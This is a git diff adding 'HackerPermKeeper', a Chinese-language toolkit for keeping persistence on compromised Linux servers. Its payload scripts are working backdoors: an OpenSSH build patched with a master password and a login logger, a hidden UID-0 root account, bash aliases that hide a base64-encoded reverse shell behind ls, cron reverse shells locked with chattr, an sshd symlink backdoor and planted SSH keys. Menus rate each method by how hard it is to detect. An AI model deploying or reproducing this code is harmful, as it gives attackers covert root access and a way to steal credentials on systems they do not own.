diff --git a/check/check.py b/check/check.py new file mode 100644 index 0000000..df9f9e4 --- /dev/null +++ b/check/check.py @@ -0,0 +1,115 @@ +# coding=utf-8 +# !/usr/bin/env python +# coding=utf-8 +from __future__ import print_function +import subprocess +import os +import platform + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def check_alerts(): + try: + output = subprocess.check_output(['alias'], stderr=subprocess.STDOUT, shell=True) + print("Yes----alerts后门") + except subprocess.CalledProcessError: + print("No----alerts后门") + + +def check_sshkey(): + file_path = "/root/.ssh/authorized_keys" + if os.path.exists(file_path): + print("Yes----ssh公私密钥后门") + else: + print("Yes----ssh公私密钥后门") + + +def check_adduser(): + root_gid = 0 # GID for "root" + # Get current user's GID + current_gid = os.getgid() + # Check if current user is a member of the root group + if current_gid == root_gid: + print("yes----ssh后门用户") + else: + print("No----ssh后门用户") + + +def check_crontab(): + cron_files = ["/etc/crontab"] + for cron_file in cron_files: + if os.access(cron_file, os.W_OK): + print("yes----计划任务后门") + else: + print("No----计划任务后门") + + +def check_strace(): + j = ml('strace -V') + if 'strace -- version' in j: + print("yes----strace后门") + else: + print("No----strace后门") + + +def check_ssh_Soft_link(): + command = 'cat /etc/ssh/sshd_config|grep UsePAM' + j = ml(command) + if 'UsePAM yes' in j: + print("yes----SSH软链接后门") + else: + print("No----SSH软链接后门") + + +def check_Rootkit(): + system_info = platform.uname() + kernel_version = platform.release() + # 定义支持的最低和最高内核版本 + min_kernel_version = { + 'Centos 6.10': '2.6.32-754.6.3.el6.x86_64', + 'Centos 7': '3.10.0-862.3.2.el7.x86_64', + 'Centos 8': '4.18.0-147.5.1.el8_1.x86_64', + 'Ubuntu 18.04.1 LTS': '4.15.0-38-generic' + } + max_kernel_version = { + 'Centos 6.10': '2.6.32', + 'Centos 7': '3.10.0', + 'Centos 8': '4.18.0', + 'Ubuntu 18.04.1 LTS': '4.15.0' + } + current_os = system_info[0] + ' ' + system_info[2] + ': ' + kernel_version + if current_os in min_kernel_version: + min_version = min_kernel_version[current_os] + max_version = max_kernel_version[current_os] + + if min_version <= kernel_version <= max_version: + print("yes----Rootkit后门:https://github.com/f0rb1dd3n/Reptile/") + else: + print("No----Rootkit后门") + + +if __name__ == '__main__': + print('HackerPermKeeper') + print('OpenSSH后门太过久远,而且很可能会导致ssh连接报错,所以不建议使用[只测试过乌班图14版本成功]') + check_adduser() + check_alerts() + check_crontab() + check_ssh_Soft_link() + check_sshkey() + check_strace() + check_Rootkit() diff --git a/choose.py b/choose.py new file mode 100644 index 0000000..3122636 --- /dev/null +++ b/choose.py @@ -0,0 +1,111 @@ +# coding=utf-8 +# !/usr/bin/env python +import sys + +from colorama import init +from termcolor import colored +import os + + +init() + + +def Dowfile(input_files,file_name): + if not os.path.exists('payloads'): + os.makedirs('payloads') + with open(input_files, 'r', encoding='utf-8') as input_file, open('payloads/'+file_name, 'w+',encoding='utf-8') as output_file: + # 读取输入文件的内容 + content = input_file.read() + + # 将内容写入输出文件 + output_file.write(content) + print(f'生成成功,文件为:/payloads/{file_name}') + + +def chooses(): + s = [] + i = 0 + print(colored('HackerPermKeeper v1.0 弱鸡 支持以下漏洞检测 https://github.com/ytMuCheng/HackerPermKeeper/', 'green')) + print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red')) + print(colored('2--------------后门用户', 'yellow'),colored('[利用]', 'red')) + print(colored('3--------------Alias后门', 'yellow'),colored('[利用]', 'red')) + print(colored('4--------------crontab计划任务', 'yellow'),colored('[利用]', 'red')) + print(colored('5--------------ssh软连接后门', 'yellow'),colored('[利用]', 'red')) + print(colored('6--------------ssh公私密钥后门', 'yellow'),colored('[利用]', 'red')) + print(colored('7--------------Strace后门', 'yellow'),colored('[利用]', 'red')) + print(colored('8--------------Rootkit后门', 'yellow'),colored('[检测]', 'blue')) + print(colored('HackerPermKeeper[请输入多个模块序号, 一行一个,输入exit输出完成]', 'green')) + while True: + a = input(colored(f'[{i}]:', 'green')) + if a in ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'exit']: + i = i + 1 + if a != 'exit': + if a == str(1): + print('请修改生成完的文件,里面的记录明文的文件位置') + Dowfile('payload/1OpenSSH/sshOpenSSH.py','sshOpenSSH.py') + break + elif a == str(2): + print('请修改生成完的文件,里面的用户名和密码') + i = input('创不创home目录下用户文件夹[不创建的话,使用会出现一些bug,建议创建]:[1]不创建 [2]创建:') + if i == '1': + Dowfile('payload/adduser/adduser.py','adduser.py') + elif i == '2': + Dowfile('payload/adduser/adduser_new_user.py','adduser_new_user.py') + else: + print('输入错误') + break + elif a == str(3): + print('请修改生成完的文件,里面的反弹shell的ip以及port') + i = input('输入python版本[3 or 2]:') + if i == '3': + Dowfile('payload/alerts/alerts.py','alerts.py') + elif i == '2': + Dowfile('payload/alerts/alerts2.py','alerts2.py') + else: + print('输入错误') + break + elif a == str(4): + print('请修改生成完的文件,里面的反弹shell的ip以及port') + i = input('计划任务后门分为:[1]直接写入/etc/crontab文件中 or [2]直接使用crontab命令生成:') + if i == '1': + Dowfile('payload/crontab/etc_Cron.py', 'etc_Cron.py') + elif i == '2': + Dowfile('payload/crontab/Cron_n.py', 'Cron_n.py') + else: + print('输入错误') + break + elif a == str(5): + print('请修改生成完的文件,里面的连接端口 [连接ssh user@ip -p port]') + Dowfile('payload/ssh_Soft_link/ssh_Soft_link.py', 'ssh_Soft_link.py') + break + elif a == str(6): + i = input('ssh公私密钥后门分为:[1]在自己服务器生成 or [2]在目标机器生成:') + if i == '1': + print( + '生成之后,运行ssh-keygen -t ed25519 -N "admin!@#45123", -N为密码,注意需要把id_ed25519.pub,填入生成的文件id_ed25519_pub变量中,连接ssh -i id_ed25519 user@ip 如果连接报错,请输入chmod 600 id_ed25519') + Dowfile('payload/sshkey/sshkey_local.py', 'sshkey_local.py') + break + elif i == '2': + print('生成之后,修改文件中的password密码,在目标机器运行之后,下载/tmp/.11 密钥文件,连接ssh -i .11 root@ip 如果连接报错,请输入chmod 600 .11' + '在对方服务器运行之后,下载/tmp/.11文件,这个文件就是密钥文件,下载之后可以删除,然后在连接') + Dowfile('payload/sshkey/sshkey_target.py', 'sshkey_target.py') + break + else: + print('输入错误') + break + elif a == str(7): + print('请修改生成完的文件,里面的记录明文的文件位置') + Dowfile('payload/strace/sshd.py','sshd.py') + break + elif a == str(8): + print('项目地址:https://github.com/f0rb1dd3n/Reptile/') + break + else: + print('Null') + break + else: + pass + break + else: + print("输入无效,请重新输入!") + a = input(colored(f'[{i}]:', 'green')) diff --git a/config.py b/config.py new file mode 100644 index 0000000..c14fe5c --- /dev/null +++ b/config.py @@ -0,0 +1,47 @@ +# coding=utf-8 +# !/usr/bin/env python + + +from colorama import init +from termcolor import colored + +init() + + +def configs(): + print(colored('HackerPermKeeper v1.0 by 弱鸡 支持以下漏洞检测 https://github.com/ytMuCheng/HackerPermKeeper/', 'green')) + print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red')) + print('OpenSSH后门 优点:直接重置目标服务器的OpenSSH,在里面写入万能密码以及记录ssh明文账户代码 '' 缺点:需要依大量的依赖环境,而且只能使用低版本系统,目前经过测试的有乌班图14',colored('[建议指数:*]\n', 'red')) + + print(colored('2--------------后门用户', 'yellow'),colored('[利用]', 'red')) + print('后门用户 优点:直接写入后门用户,而且不生成home目录下文件,快捷方便,所有系统支持 缺点:容易发现',colored('[**]\n', 'red')) + + print(colored('3--------------Alias别名后门', 'yellow'),colored('[利用]', 'red')) + print('Alias别名后门 优点:使用别名来执行命令或者反弹shell,如执行ls,设置之后,就会反弹shell 缺点:需要当前用户执行命令为常用命令',colored('[***]\n', 'red')) + + print(colored('4--------------crontab计划任务', 'yellow'),colored('[利用]', 'red')) + print('crontab计划任务 优点:设置计划任务来执行反弹shell,其中参考了挖矿病毒计划任务,其中有直接执行crontab来写入,还有直接写入/etc/crontab文件中 缺点:出网执行反弹shell,在流量会被发现',colored('[****]\n', 'red')) + + print(colored('5--------------ssh软连接后门', 'yellow'),colored('[利用]', 'red')) + print('ssh软连接后门 优点:快速设置ssh连接,不需要密码 缺点:在流量会被发现',colored('[****]\n', 'red')) + + print(colored('6--------------ssh公私密钥后门', 'yellow'),colored('[利用]', 'red')) + print('ssh公私密钥后门 优点:快速设置密钥连接,其中参考了挖矿病毒ssh公私密钥,管理员很难发现 缺点:在流量会被发现', colored('[*****]\n', 'red')) + + print(colored('7--------------Strace后门', 'yellow'),colored('[利用]', 'red')) + print('Strace后门 优点:键盘记录的后门,记录ssh明文以及密钥 缺点:需要配合权限维持使用',colored('[****]\n', 'red')) + + print(colored('8--------------Rootkit后门', 'yellow'),colored('[检测]', 'blue')) + print('Rootkit后[使用的是github项目] 优点:很难发现,几乎不可能发现,而且Rootkit后门包括了反弹shell[使用netstat -tulnp,不会显示],文件隐藏等 缺点:对于系统版本要求很严格',colored('[******]', 'red')) + print('项目地址:https://github.com/f0rb1dd3n/Reptile/') + +def configss(): + print(colored('HackerPermKeeper v1.0 by 弱鸡 支持以下漏洞检测 https://github.com/ytMuCheng/HackerPermKeeper/', 'green')) + print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red')) + print(colored('2--------------后门用户', 'yellow'),colored('[利用]', 'red')) + print(colored('3--------------Alias后门', 'yellow'),colored('[利用]', 'red')) + print(colored('4--------------crontab计划任务', 'yellow'),colored('[利用]', 'red')) + print(colored('5--------------ssh软连接后门', 'yellow'),colored('[利用]', 'red')) + print(colored('6--------------ssh公私密钥后门', 'yellow'),colored('[利用]', 'red')) + print(colored('7--------------Strace后门', 'yellow'),colored('[利用]', 'red')) + print(colored('8--------------Rootkit后门', 'yellow'),colored('[检测]', 'blue')) diff --git a/main.py b/main.py new file mode 100644 index 0000000..1c32d31 --- /dev/null +++ b/main.py @@ -0,0 +1,45 @@ +# coding=utf-8 +# !/usr/bin/env python + + +from colorama import init +from termcolor import colored +from argparse import ArgumentParser +import os +import sys + +from config import configs +from config import configss +from choose import chooses + +init() + + +try: + name = colored('HackerPermKeeper v1.0 by 弱鸡 https://github.com/ytMuCheng/HackerPermKeeper/', 'green') + arg = ArgumentParser(description=name ) # 创建解析器, description内容就是 + arg.add_argument("-m", "--multiple", help="选择权限维持模块 -m 1") + arg.add_argument("-c", "--config", help="查看支持的权限维持模块 -c 1,查看详细使用说明 -c 2 ") + args = arg.parse_args() # 解析参数 + multiple = args.multiple # 接受参数 + config = args.config # 接受参数 + if multiple != None or config != None: + if multiple != None: + chooses() + if config != None: + if config == '1': + configss() + elif config == '2': + configs() + else: + print('输入错误') + configss() + + else: + os.system('python main.py -h') + sys.exit() + +except KeyboardInterrupt as error: # ctr +c + print(colored(f'\n------------------------------------------', 'red'), '{', colored("程序终止", "green"), '}', + colored(f'------------------------------------------', 'red')) + sys.exit() diff --git a/payload/1OpenSSH/sshOpenSSH.py b/payload/1OpenSSH/sshOpenSSH.py new file mode 100644 index 0000000..2913b4f --- /dev/null +++ b/payload/1OpenSSH/sshOpenSSH.py @@ -0,0 +1,122 @@ +# coding=utf-8 +# !/usr/bin/env python +import subprocess +import os + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def Dowrj(): + command = "ls -la" + j = ml(command) + if "0x06-openssh-5.9p1.patch.tar.gz" in j and "openssh-5.9p1.tar.gz" in j: + print("----------------------->软件包已经存在<-----------------------") + return 1 + else: + print("----------------------->正在下载软件包<-----------------------") + return 0 + + +def dfiel(): + command = "tar -xzvf openssh-5.9p1.tar.gz && tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz && cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1 &&cd openssh-5.9p1 && patch < sshbd5.9p1.diff" + ml(command) + + +def miyue(old_contentm, new_content): + filename = "openssh-5.9p1/includes.h" + with open(filename, 'r') as file: + lines = file.readlines() + for a in range(0, 3): + with open(filename, 'w') as file: + for line in lines: + if line.strip() != old_contentm.strip(): + file.write(line) + file.write(new_content + '\n') + + +def check_package_DowUbuntu(): + packages = ['openssl', 'libssl-dev', 'libpam0g-dev', 'libkrb5-dev', 'make', 'gcc', 'g++'] + print('------------------------->正在安装依赖<-------------------------') + for package in packages: + devnull = open(os.devnull, 'w') + result = subprocess.Popen(['dpkg', '-s', package], stdout=subprocess.PIPE, stderr=devnull) + result.wait() + if result.returncode == 0: + print("----------------------->{} 已安装<-----------------------".format(package)) + else: + print("----------------------->{} 未安装<-----------------------".format(package)) + command = "apt-get install -y {}".format(package) + ml(command) + devnull = open(os.devnull, 'w') + result = subprocess.Popen(['dpkg', '-s', package], stdout=subprocess.PIPE, stderr=devnull) + result.wait() + if result.returncode == 0: + print("----------------------->{} 已安装<-----------------------".format(package)) + else: + print("----------------------->{} 安装失败<-----------------------".format(package)) + + return True + + +def DowUbuntu(password): + check_package = check_package_DowUbuntu() + if not check_package: + print("正在安装软件包") + + command = "./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 && make && make install" + current_path = os.getcwd() + working_directory = os.path.join(current_path, "openssh-5.9p1") + process = subprocess.Popen(command, shell=True, cwd=working_directory) + process.wait() + + ml("service ssh restart") + ml("rm -rf 0x06-openssh-5.9p1.patch.tar.gz") + ml("rm -rf openssh-5.9p1.tar.gz") + ml("rm -rf penssh-5.9p1") + ml("rm -rf openssh-5.9p1.patch") + print("------------------------>软件包已经清除<-------------------------") + restart_result = ml("service ssh status") + if restart_result is not None and "ssh start/spawned" in restart_result: + print("密码为"+password) + + + +if __name__ == '__main__': + if Dowrj() == 0: + command = "wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz && wget https://mirror.aarnet.edu.au/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz" + subprocess.Popen(command, shell=True).wait() + # .wait() 是 subprocess.Popen() 对象的方法之一,用于等待子进程完成执行并返回退出状态。 + + dfiel() + + llinst = ['#define SECRETPW "apaajaboleh"', ' #define ILOG "/tmp/ilog"', '#define OLOG "/tmp/olog"', + '#endif /* INCLUDES_H */'] + password = 'admin123!@qwe' + password2 = '/tmp/ilog' + password3 = '/tmp/olog' + llinst_new_content = ['0', '0', '0', '#endif /* INCLUDES_H */'] + llinst_new_content[0] = '#define SECRETPW "' + password + '"' + llinst_new_content[1] = '#define ILOG "' + password2 + '"' + llinst_new_content[2] = '#define OLOG "' + password3 + '"' + """ +#define ILOG "/tmp/ilog" #ILOG是别人用ssh登录该主机记录的日志目录[以及登录密码,当是不会记录隐藏账户] +#define OLOG "/tmp/olog" #OLOG是该主机用ssh登录其他主机记录的日志目录 +#define SECRETPW "xiaodi" #万能密码 + """ + for a in range(0, 4): + miyue(llinst[a], llinst_new_content[a]) + DowUbuntu(password) diff --git a/payload/adduser/adduser.py b/payload/adduser/adduser.py new file mode 100644 index 0000000..407a25e --- /dev/null +++ b/payload/adduser/adduser.py @@ -0,0 +1,47 @@ +# coding=utf-8 +# !/usr/bin/env python +from __future__ import print_function +import subprocess + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def adduser(user, password): + command = "useradd -p $(openssl passwd -1 -salt 'salt' " + password + ") " + user + " -o -u 0 -g root -G root -s /bin/bash -M" + ml(command) + command = "cat /etc/passwd" + j = ml(command) + command = "cat /etc/shadow" + j2 = ml(command) + if user in j and user in j2: + print("----------------------->user:" + user + "password: " + password + "< -----------------------") + else: + print("----------------------->失败<-----------------------") + + +def deluser(user): + command = "sed -i '/^" + user + ":/d' /etc/shadow" + ml(command) + command = "sed -i '/^" + user + ":/d' /etc/passwd" + ml(command) + + +if __name__ == '__main__': + user = 'passw123' + password = 'admin@#45123' + adduser(user, password) + # deluser(user) #删除用户 diff --git a/payload/adduser/adduser_new_user.py b/payload/adduser/adduser_new_user.py new file mode 100644 index 0000000..1ed637d --- /dev/null +++ b/payload/adduser/adduser_new_user.py @@ -0,0 +1,46 @@ +# coding=utf-8 +from __future__ import print_function +import subprocess + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def adduser(user, password): + command = "useradd -p $(openssl passwd -1 -salt 'salt' " + password + ") " + user + " -o -u 0 -g root -G root -s /bin/bash -d /root" + ml(command) + command = "cat /etc/passwd" + j = ml(command) + command = "cat /etc/shadow" + j2 = ml(command) + if user in j and user in j2: + print("----------------------->user:" + user + " password: " + password + "< -----------------------") + else: + print("----------------------->失败<-----------------------") + + +def deluser(user): + command = "sed -i '/^" + user + ":/d' /etc/shadow" + ml(command) + command = "sed -i '/^" + user + ":/d' /etc/passwd" + ml(command) + + +if __name__ == '__main__': + user = 'passw123' + password = 'admin@#45123' + adduser(user, password) + # deluser(user) #删除用户 diff --git a/payload/alerts/alerts.py b/payload/alerts/alerts.py new file mode 100644 index 0000000..6df47e5 --- /dev/null +++ b/payload/alerts/alerts.py @@ -0,0 +1,86 @@ +# coding=utf-8 +# !/usr/bin/env python +import subprocess +import os +import base64 + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def newfile(new_content): + filename = "/etc/update-manager/release-update" + with open(filename, 'a+') as file: + file.write(new_content + '\n') + + +def newfile2(): + filename = os.path.expanduser("~/.bashrc") + new_content = """ +#enable software update with apt +#See /etc/apt/source.d/ in the apt package. +if [ -f /etc/update-manager/release-update ]; then + . /etc/update-manager/release-update +fi + """ + with open(filename, 'a') as file: + file.write(new_content + '\n') + + +def base64_encode(): + data = ''' +import os +import socket +import subprocess +import sys + +ret = os.fork() + +if ret > 0: + sys.exit() +else: + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect(("192.168.86.131", 3322)) + os.dup2(s.fileno(), 0) + os.dup2(s.fileno(), 1) + os.dup2(s.fileno(), 2) + p = subprocess.call(["/bin/bash", "-i"]) + except Exception as e: + sys.exit() + ''' + encoded_bytes = base64.b64encode(data.encode('utf-8')) + encoded_string = encoded_bytes.decode('utf-8') + return encoded_string + +def checkkey(): + file_path = "/etc/update-manager/release-update" + if os.path.exists(file_path): + print("Yes----成功") + else: + print("No----失败") + +if __name__ == '__main__': + payload = base64_encode() + newfile( + """alias ls='alerts(){ ls $* --color=auto;python3 -c "import base64,sys;exec(base64.b64decode('\\''""" + payload + """'\\''))";};alerts'""") + newfile( + """alias unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'""") + newfile( + """alias alias='alerts(){ alias "$@" | grep -v unalias | sed "s/alerts.*lambda.*/ls --color=auto'\\''/";};alerts'""") + newfile2() + ml('sudo touch -acmr /etc/update-manager/release-upgrades /etc/update-manager/release-update') + checkkey() \ No newline at end of file diff --git a/payload/alerts/alerts2.py b/payload/alerts/alerts2.py new file mode 100644 index 0000000..315ce2d --- /dev/null +++ b/payload/alerts/alerts2.py @@ -0,0 +1,86 @@ +# coding=utf-8 +# !/usr/bin/env python +import subprocess +import os +import base64 + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def newfile(new_content): + filename = "/etc/update-manager/release-update" + with open(filename, 'a+') as file: + file.write(new_content + '\n') + + +def newfile2(): + filename = os.path.expanduser("~/.bashrc") + new_content = """ +#enable software update with apt +#See /etc/apt/source.d/ in the apt package. +if [ -f /etc/update-manager/release-update ]; then + . /etc/update-manager/release-update +fi + """ + with open(filename, 'a') as file: + file.write(new_content + '\n') + + +def base64en(): + code = ''' +import os +import socket +import subprocess +import sys + +ret = os.fork() + +if ret > 0: + sys.exit() +else: + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect(("192.168.86.131", 3333)) + os.dup2(s.fileno(), 0) + os.dup2(s.fileno(), 1) + os.dup2(s.fileno(), 2) + p = subprocess.call(["/bin/bash", "-i"]) + except Exception as e: + sys.exit() + ''' + encoded_code = base64.b64encode(code) + return encoded_code + +def checkkey(): + file_path = "/etc/update-manager/release-update" + if os.path.exists(file_path): + print("Yes----成功") + else: + print("No----失败") + +if __name__ == '__main__': + # alias ls='alerts(){ ls $* --color=auto;执行的命令;};alerts' + payload = base64en() + newfile( + """alias ls='alerts(){ ls $* --color=auto;python2 -c "import base64,sys;exec(base64.b64decode('\\''""" + payload + """'\\''))";};alerts'""") + newfile( + """alias unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'""") + newfile( + """alias alias='alerts(){ alias "$@" | grep -v unalias | sed "s/alerts.*lambda.*/ls --color=auto'\\''/";};alerts'""") + newfile2() + ml('sudo touch -acmr /etc/update-manager/release-upgrades /etc/update-manager/release-update') + checkkey() diff --git a/payload/crontab/Cron_n.py b/payload/crontab/Cron_n.py new file mode 100644 index 0000000..f867531 --- /dev/null +++ b/payload/crontab/Cron_n.py @@ -0,0 +1,51 @@ +# coding=utf-8 +# !/usr/bin/env python +from __future__ import print_function +import subprocess +import os + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def etc_crontab(shell, file_path): + with open(file_path, 'w') as file: + file.write(shell) + + command = '(crontab -l;printf "*/1 * * * * ' + ' /bin/bash ' + file_path + ';/bin/bash --noprofile -i;\\rno crontab for `whoami` %100c\\n")|crontab -' + ml(command) + + +def xt(file_path): + command = 'chattr +i /var/spool/cron/' + ml(command) + command = 'chattr +i ' + file_path + ml(command) + +def check_sshkey(file_path): + if os.path.exists(file_path): + print("Yes----crontab计划任务后门") + else: + print("No----crontab计划任务后门") + +if __name__ == '__main__': + # https://taoyuan.cool/shell/在这个网站获取反弹shell语句写在下面,注意,下面语句如果有双引号,请加上\\"进行转义,下面语句也可以在计划任务中,执行某个命令 + shell = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.86.131",3322));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'""" + file_path = "/tmp/.xx.sh" + etc_crontab(shell, file_path) + command = 'chmod + x ' + file_path + ml(command) + xt(file_path) + check_sshkey(file_path) diff --git a/payload/crontab/etc_Cron.py b/payload/crontab/etc_Cron.py new file mode 100644 index 0000000..8cb05cf --- /dev/null +++ b/payload/crontab/etc_Cron.py @@ -0,0 +1,40 @@ +# coding=utf-8 +# !/usr/bin/env python +from __future__ import print_function +import subprocess + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def etc_crontab(shell): + command = 'whoami' + user = ml(command).strip() + command = 'echo "*/1 * * * * ' + user + ' ' + shell + '" | sudo tee -a /etc/crontab' + ml(command) + command = 'cat /etc/crontab' + j = ml(command) + if '*/1 * * * *' in j: + print("Yes----crontab计划任务后门") + else: + print("No----crontab计划任务后门") + + +if __name__ == '__main__': + # https://taoyuan.cool/shell/在这个网站获取反弹shell语句写在下面,注意,下面语句如果有双引号,请加上\\"进行转义,下面语句也可以在计划任务中,执行某个命令 + shell = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"192.168.86.131\\",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\\"bash\\")'""" + etc_crontab(shell) + ml('chattr +i /etc/crontab') diff --git a/payload/ssh_Soft_link/ssh_Soft_link.py b/payload/ssh_Soft_link/ssh_Soft_link.py new file mode 100644 index 0000000..b7849ed --- /dev/null +++ b/payload/ssh_Soft_link/ssh_Soft_link.py @@ -0,0 +1,58 @@ +# coding=utf-8 +# !/usr/bin/env python +from __future__ import print_function +import subprocess +import socket + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def ssh(port): + command = 'ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=' + str(port) + ml(command) + host = '127.0.0.1' + # 创建套接字对象 + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + # 尝试连接到远程主机 + sock.connect((host, port)) + print("连接成功") + except Exception as e: + print("连接失败") + finally: + # 关闭套接字连接 + sock.close() + +def miyue(new_content): + filename = "/etc/ssh/sshd_config" + with open(filename, 'a') as file: + file.write(new_content + '\n') + + +if __name__ == '__main__': + command = 'cat /etc/ssh/sshd_config|grep UsePAM' + j = ml(command) + if 'UsePAM yes' in j: + print('可以使用SSH软链接后门,使用ps -aux关闭连接,删除/tmp/su文件') + port = 8877 + ssh(port) + else: + print('正在开启UsePAM') + miyue('UsePAM yes') + print('可以使用SSH软链接后门,使用ps -aux关闭连接,删除/tmp/su文件') + port = 8877 + ssh(port) diff --git a/payload/sshkey/sshkey_local.py b/payload/sshkey/sshkey_local.py new file mode 100644 index 0000000..a88a186 --- /dev/null +++ b/payload/sshkey/sshkey_local.py @@ -0,0 +1,62 @@ +# coding=utf-8 +# !/usr/bin/env python +from __future__ import print_function +import subprocess +import os + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def miyue(new_content): + filename = "/etc/ssh/sshd_config" + with open(filename, 'a') as file: + file.write(new_content + '\n') + + +def authorized_keys(new_content): + ssh_dir = "/root/.ssh" + authorized_keys_file = "/root/.ssh/authorized_keys" + # 创建.ssh目录(如果不存在) + if not os.path.exists(ssh_dir): + os.makedirs(ssh_dir) + # 创建authorized_keys文件(如果不存在) + if not os.path.exists(authorized_keys_file): + with open(authorized_keys_file, 'w') as file: + pass # 创建一个空文件 + # 将新内容追加到authorized_keys文件末尾 + with open(authorized_keys_file, 'a') as file: + file.write(new_content + '\n') + + +def file_key(): + file_path = "/root/.ssh/authorized_keys" + if os.path.exists(file_path): + print("文件写入成功") + else: + print("文件写入失败") + + +if __name__ == '__main__': + id_ed25519_pub = "ssh-ed25519 